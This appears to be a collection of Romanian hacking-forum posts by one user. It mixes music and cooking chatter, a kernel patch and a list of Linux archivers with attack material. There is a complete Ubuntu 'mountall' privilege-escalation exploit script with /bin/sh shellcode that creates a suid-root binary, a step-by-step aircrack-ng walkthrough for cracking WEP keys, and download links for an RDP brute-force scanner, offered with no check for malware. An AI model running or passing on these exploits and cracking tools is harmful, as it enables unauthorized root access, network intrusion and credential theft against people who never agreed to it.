Nytro

Hmm: GET /u57536064/audio/0461a6471ce5.mp3 HTTP/1.1 Accept: */* Host: cs4836.vkontakte.ru User-Agent: GJ LdzcJv22SAdkQiBH5hD it4qD47 I YdAfpixJ AGdb1RdLcK Connection: close Oricum, mi mi-a mers, l-am descarcat pe Florin Salan.

Haaa, merge pe Wine si imi gaseste manele :->

La puscarie, la puscarie, la puscariiiiiiiiiiiiiiiiiieeeeeeeeeeeeeeee! _|_

archaeus5: Momentan nu stiu sa fac decat clatite . Dar o sa incerc eu tot felul de porcarii. Park: Imi place si mie psihologia, am citit o carte si din alta doar ce m-a interesat. Insa parca "te duc in lumea lor", abunda in termeni psihologici, in diverse denumiri stiitifice pentru orice lucru banal, te baga putin in ceata.

Mi-am luat si eu o carte: "1000 de retete pentru incepatori si bucatari amatori"

Ba, nu-mi plac deloc cacaturile astea...

La mine: "This page has had 4,338 visits " De obicei cred ca se uita dupa ce primesc un warn, spera sa gaseasca ceva interesant probabil.

Ma pis pe el, sa moara in puscarie, si el, si toti cei ca el care fura. Si da, multumim media pentru ca a sinonimizat cuvantul "hacker" cu HOT.

Probabil foloseste utilitarele de la Nirsoft pentru a obtine datele dorite, nu vad ce ar fi in neregula cu asta

Wikipedia: "PaX is a patch for the Linux kernel that implements least privilege protections for memory pages. The least-privilege approach allows computer programs to do only what they have to do in order to be able to execute properly, and nothing more. PaX was first released in 2000."

Sunteti slabi, cu Nokia 3310 puteti face sniffing la convorbiri, le puteti inregistra.

Ubuntu Linux 'mountall' Local Privilege Escalation Vulnerability #!/bin/sh # by fuzz. For Anux inc. # # ubuntu 10.04 , 10.10 if [ -z "$1" ] then echo "usage: $0 <UDEV KERNEL EVENT>" echo "see here http://www.reactivated.net/writing_udev_rules.html" exit fi cat > usn985-exploit.sh << EOF #!/bin/sh chown root:root $PWD/usn985-sc chmod +s $PWD/usn985-sc EOF cat > usn985-sc.c << EOF char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68" "\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"; main(){int *r;*((int *)&r+2)=(int)s;} EOF gcc usn985-sc.c -o usn985-sc echo "KERNEL==\"$1\", RUN+=\"$PWD/usn985-exploit.sh\"" >> /dev/.udev/rules.d/root.rules chmod +x usn985-exploit.sh echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat.)" echo "Once the conf is reloaded, just make the udev event happen : usn985-sc file will get suid-root" Vulnerable: Ubuntu Ubuntu Linux 10.04 LTS Not Vulnerable: Ubuntu mountall 2.15.2 Ubuntu Linux 'mountall' Local Privilege Escalation Vulnerability [I]Ubuntu Linux is prone to a local privilege-escalation vulnerability that affects the 'mountall' package. Local attackers can exploit this issue to execute arbitrary commands as the 'root' user. Successful exploits can completely compromise an affected computer. Ubuntu 10.04 LTS is vulnerable; other versions may also be affected. [/I] Update: http://security.ubuntu.com/ubuntu/pool/main/m/mountall/mountall_2.15.2_i386.deb Incercati si voi, cei cu Ubuntu.

Mi se pare o mare tampenie. 1) $ipLog="cookies.html"; - Datele sunt salvate intr-un fisier HTML, asta inseamna un posibil XSS (na, nu prea util, dar cine stie) 2) $cookie = $HTTP_GET_VARS["c"]; - Asta nu e cookie Da, salveaza cateva date, dar cam atat, cookie pauza. Si se poate mai elegant, sa se foloseasca php_gd si sa se genereze o imagine png, astfel nu va avea cum sa stie nimeni (nu neaparat) ca e vorba de un script PHP.

Nu aici. Trashed.

[PATCH] /drivers/acpi/acpica/nsrepair.c (2.6.34.7) - Fixed useless compile warning Avertisment: drivers/acpi/acpica/nsrepair.c: In function ‘acpi_ns_repair_object’: drivers/acpi/acpica/nsrepair.c:125:29: warning: ‘new_object’ may be used uninitialized in this function Patch: --- a/drivers/acpi/acpica/nsrepair.c 2010-09-20 08:35:56.568006487 +0300 +++ b/drivers/acpi/acpica/nsrepair.c 2010-09-20 08:00:40.000000000 +0300 @@ -122,7 +122,7 @@ acpi_ns_repair_object(struct acpi_predef union acpi_operand_object **return_object_ptr) { union acpi_operand_object *return_object = *return_object_ptr; - union acpi_operand_object *new_object; + union acpi_operand_object *new_object = NULL; acpi_status status; ACPI_FUNCTION_NAME(ns_repair_object);

ISO/ISC DTR 19769 (August 21, 2010) Working Draft, Standard for Programming Language C++ Download: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2010/n3126.pdf Interesant, si are doar 1331 (puteau sa mai puna si ei inca 6 cu poze) de pagini.

Prefer Asus, Intel, ATI. De ce? Habar nu am. Dar mi se par firme serioase, mai serioase decat competitorii. La mine e ca si Nokia vs altceva. Mi se par produsele mai de calitate. Nu stiu cum sa spun, dar intre un procesor Intel si unul AMD cu exact aceleasi "calitati" (features) as alege Intel.

Open Source File Archivers for Linux Posted by jun auza On 9/16/2010 A computer program that merges a number of files together into one archive file, or a series of archive files, for simpler transportation, storage, or backup is called a file archiver. Archiving or packing refers to the process of making an archive file, while unarchiving, unpacking or extracting means reconstructing the original files from the archive. The simplest file archivers just gather a list of files and concatenate their contents sequentially into the archive. For transferring a large number of individual files over a high latency network like the Internet, numerous file archivers employ archive formats that provide lossless data compression to reduce the size of the archive. If you are looking for a capable free and open-source file archiver for Linux, you should check out this list, and then pick out the one that would suit your needs: Xarchiver Xarchiver is a popular GTK+2 based file archiver that is designed to be independent of the desktop environment. It is utilized in a good number of lightweight Linux distributions like Xfce and LXDE. Xarchiver supports 7-zip, arj, bzip2, gzip, rar, lha, lzma, lzop, deb, rpm, tar and zip archives, archive navigation with mimetype icons, archive comment ability and archive listing as HTML or txt. Cut/Copy/Paste/Rename actions within files of variety of archives are also supported. Password detection and protection is automatic for arj, zip and rar files. File Roller File Roller is a simple and easy-to-use archive manager for the GNOME desktop environment. It has a graphical user interface and can create and modify archives, view the content of an archive and files contained in the archive, and of course extract files from the archive. It supports plenty of archive files such as 7-Zip (.7z), Tar, WinAce (.ace), gzip, RAR, and a whole lot more. Ark Ark is an archiving tool for the KDE desktop environment that is included into kdeutils package. It can view, extract, create, and modify archives through its intuitive GUI. Ark can handle different file formats that include tar, gzip, bzip2, zip, rar and lha. If the appropriate plugin from kdeaddons package is installed, it can be integrated into Konqueror in the KDE environment to handle archives through KParts technology. PeaZip PeaZip is both a file manager and file archiver that supports its native PEA archive format, featuring compression, multi volume split and flexible authenticated encryption, and integrity check schemes. It also has support for other mainstream formats, with special focus on handling open formats. With PeaZip, users can run extracting and archiving operations automatically using command-line generated exporting the job defined in the GUI front-end. For speeding up archiving or backup operation's definition, it can also create, edit and restore an archive's layout. FreeArc FreeArc is a fast and efficient file archiver that is said to work 2–5 times quicker than best programs in each compression class (ccm, 7-zip, rar, uharc -mz, pkzip) while retaining the same compression ratio. From technical grounds, it is superior to any existing practical compressor. Features include: * AES/Blowfish/Twofish/Serpent encryption * FAR and Total Commander plugins * Solid compression with smart updates * Ability to create self-extracting archives and installers * Archive protection and recovery

Liviu Guta, Florin Peste si Play AJ - Sambata, duminica :->

Ideea e simpla. Nu ma intereseaza daca e infectat sau nu. Daca sunteti baieti isteti il rulati pe masina virtuala. Daca sunteti si mai destepti nu il descarcati, deci nu il rulati.

Mm de copil prost. http://www.virustotal.com/file-scan/report.html?id=28d0e945f0648bed7b7b2a2139f2b9bf1901feec39ff4f6c0315fa58e054f44e-1283279679 E detectat ca HACKTOOL, adica nu ca TROJAN sau ce iti mai baga mata in cur. Ban. Sa inteleaga toti ratatii ca asta de mai sus. Sunt si programe care nu fura parolele de Firefox (PSW.Stealer) sau nu permit controlul de la distanta al calculatorului vostru (Backdoor, RAT, Trojan) sau altele, dar care SUNT DETECTATE. Asta nu inseamna neaparat ca se caca in calculatoru vostru. Nu stau sa verific toate programele pe care le postez daca sunt infectate, nu o sa stea nimeni sa faca asta. Scanati pe virustotal, va uitati si voi ca ce anume e detectat un program. Sau mai bine verificati voi daca programul e infectat si gata, nu mai veniti aici ca "e virusat" sau alte prostii.

These are Top 20 Hacking Tools, the list is exhaustive, this are a few to name. Nessus The “Nessus” Project aims to provide to the internet community a free, powerful, up-to-date and easy to use remote security scanner for Linux, BSD, Solaris, and other flavors of Unix. Ethereal Ethereal is a free network protocol analyzer for Unix and Windows. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. Snort Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks. Netcat Netcat has been dubbed the network swiss army knife. It is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol TCPdump TCPdump is the most used network sniffer/analyzer for UNIX. TCPTrace analyzes the dump file format generated by TCPdump and other applications. Hping Hping is a command-line oriented TCP/IP packet assembler/analyzer, kind of like the “ping” program (but with a lot of extensions). DNSiff DNSiff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). GFI LANguard GFI LANguard Network Security Scanner (N.S.S.) automatically scans your entire network, IP by IP, and plays the devil’s advocate alerting you to security vulnerabilities. Ettercap >Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones)and includes many feature for network and host analysis. Nikto Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 2500 potentially dangerous files/CGIs, versions on over 375 servers, and version specific problems on over 230 servers. John the Ripper John the Ripper is a fast password cracker, currently available for many flavors of Unix. OpenSSH OpenSSH is a FREE version of the SSH protocol suite of network connectivity tools, which encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other network-level attacks. TripWire Tripwire is a tool that can be used for data and program integrity assurance. Kismet Kismet is an 802.11 wireless network sniffer – this is different from a normal network sniffer (such as Ethereal or tcpdump) because it separates and identifies different wireless networks in the area. NetFilter NetFilter and iptables are the framework inside the Linux 2.4.x kernel which enables packet filtering, network address translation (NAT) and other packetmangling. IP Filter IP Filter is a software package that can be used to provide network address translation (NAT) or firewall services. pf OpenBSD Packet Filter fport fport identifys all open TCP/IP and UDP ports and maps them to the owning application. SAINT SAINT network vulnerability assessment scanner detects vulnerabilities in your network’s security before they can be exploited. OpenPGP OpenPGP is a non-proprietary protocol for encrypting email using public key cryptography. It is based on PGP as originally developed by Phil Zimmermann. Sursa: Top 20 Hacking Tools | Hacking Truths

Cred ca aici e fara parola: Download RDP Brute v.0.6.rar from Sendspace.com - send big files the easy way

CRACK WIFI – Simple WEP Crack Overview To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time. Equipments used Wifi Adaptor : Alfa AWUS036H (available on eBay & Amazon) Software : Backtrack 4 (Free download from BackTrack Linux - Penetration Testing Distribution) Step 1 – Start the wireless interface in monitor mode on AP channel airmon-ng start wlan1 6 starts wifi interface in channel 6 Step 2 – Test Wireless Device Packet Injection aireplay-ng -6 -e infosec -a 00:1B:11:24:27:2E wlan1 -9 means injection -a 00:1B:11:24:27:2E is the access point MAC address Step 3 – Start airodump-ng to capture the IVs airodump-ng -c 6 –bssid 00:1B:11:24:27:2E -w output wlan1 Step 4 – Use aireplay-ng to do a fake authentication with the access point In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets. aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1 -1 means fake authentication 0 reassociation timing in seconds -e infosec is the wireless network name -a 00:14:6C:7E:40:80 is the access point MAC address -h 00:0F:B5:88:AC:82 is our card MAC address OR aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1 2 – Reauthenticate every 2 seconds. -o 1 – Send only one set of packets at a time. Default is multiple and this confuses some APs. -q 10 – Send keep alive packets every 10 seconds. Troubleshooting Tips Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and… Run: tcpdump -n -vvv -s0 -e -i | grep -i -E ”(RA:|Authentication|ssoc)” You would then look for error messages. If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. Start another session and… Run: “tcpdump -n -e -s0 -vvv -i wlan1” Here is a typical tcpdump error message you are looking for: 11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated station Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets. If you want to select only the DeAuth packets with tcpdump then you can use: “tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth”. You may need to tweak the phrase “DeAuth” to pick out the exact packets you want. Step 5 – Start aireplay-ng in ARP request replay mode aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1 Step 6 – Run aircrack-ng to obtain the WEP key aircrack-ng -b 00:1B:11:24:27:2E output*.cap All Done! Sursa: Crack Wifi | Hacking Articles

RDP Scanner [bruteForce] Nu am incercat, nu stiu daca e infectat. RDP Brutus, based on all known tss Brutus. * Select the type of scan IP: one specified range, either immediately on the list of ranges. * Option flows for the scanner, the ability to change the port for the scan * Settings flows for Brutus (how IP will be checked on a separate thread) * Ability to scan without Brutus * Brutus, a list of usernames to the list of passwords * Work anywhere on the disk (including the Russian way) * Avtosvorachivanie windows Brutus * Edit the list of usernames and passwords directly from the program * Output sbruchennyh grandparents in a separate window by pressing the button at any time (even in the Brut) * Sending Hoods at your number ICQ (master Ween - Ie only the number that you want to send - you can specify in the preferences) Howto: http://www.file-upload.net/download-2791486/h4cky0u.txt.html Download: http://www.sendspace.com/file/tv1whv Sursa: h4cky0u